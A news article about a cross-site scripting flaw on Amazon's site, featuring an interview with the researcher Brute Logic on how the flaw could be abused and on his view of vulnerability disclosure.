Amazon patches huge XSS vulnerability that left user data exposed for two days
A serious XSS vulnerability left Amazon customers in "real danger" of having their accounts compromised. The man who made the discovery is Brute Logic, the current top security researcher at XSSposed.org and "light-gray computer hacker". We spoke to him about the security issue as well as talking about the responsibilities involved in exposing vulnerabilities.
The cross-site scripting vulnerability was discovered on March 21 and was left unpatched for two days. In this time, Brute Logic says there was a real risk that people "could have their Amazon account compromised or had their computer invaded by means of a browser exploit". He says it is the responsibility of sites to fix problems when they are highlighted by the hacking community.
Brute Logic is not, like some hackers, in the habit of holding sites to ransom when a vulnerability is discovered. At the same time, he and other hackers are not out to do the cleanup work for the likes of Amazon. I asked whether he had informed Amazon of the security issue when he discovered it: "Since they do not pay for that, I just reported it to XSSposed.org and tweeted with a mention".
Google's Project Zero came in for criticism recently after Microsoft complained that the search giant's bug disclosure policy did not allow enough time for vulnerabilities to be patched. This led to Google relaxing its policy slightly, but Brute Logic thinks the approach is correct. "I think Google is just 'not being evil'. I like the way they are doing it: it is not Google's problem," he says.
But what of the Amazon vulnerability? It's all well and good to say that users were at risk, but just what does this mean?
This vulnerability let me run JavaScript code (which is responsible for some of the interactive things you can do within a webpage) in your browser. This kind of code can do things like steal your session on a given site (if it has a private area protected by a login) where I can see your credit card number or buy something in your name (in Amazon's case).
This code can also let me redirect your browser (you will not ever see it) to another site, controlled by me, that will identify your browser and select an appropriate exploit to it. If this attack succeeds (based mainly on your lack of browser, Java or Adobe updates), I will have total control over your computer.
In order to make these types of attacks happen, all that's needed is for a victim to click on a specially crafted link, but it is not that difficult once you have a legitimate link from the Amazon website. A fake email or a social network sharing is enough to trick the victim, as that will play on his/her trust in the Amazon reputation.
But what risks were people really at?
Amazon customers were in real danger: it is very easy to launch a massive spam campaign pointing to a link that exploits this flaw.
Brute Logic explained to me that the vulnerability was discovered "by chance. I just use a custom scan from Google results".
So what about the responsibility of someone discovering a vulnerability? How does this tie into describing yourself as a light-gray hacker?
The vulnerability itself has no color: what we did with it is what makes us white, black or gray. I am light gray because I don't care about what white hats call "responsible disclosure", in which they report and collaborate with vendor before making the vulnerability public... unless they pay me well for it. But I don't do anything for money; I refuse to go for the dark side of hacking.
Does the responsibility lie with the person discovering a vulnerability to share it with the world, or with the site or service with the problem?
I think this is a site/service problem. We are forcing the websites to be secure and their owners to stay tuned to what is happening in our hacking community. It is their fault to not take security seriously. We do.
Photo credit: wk1003mike / Shutterstock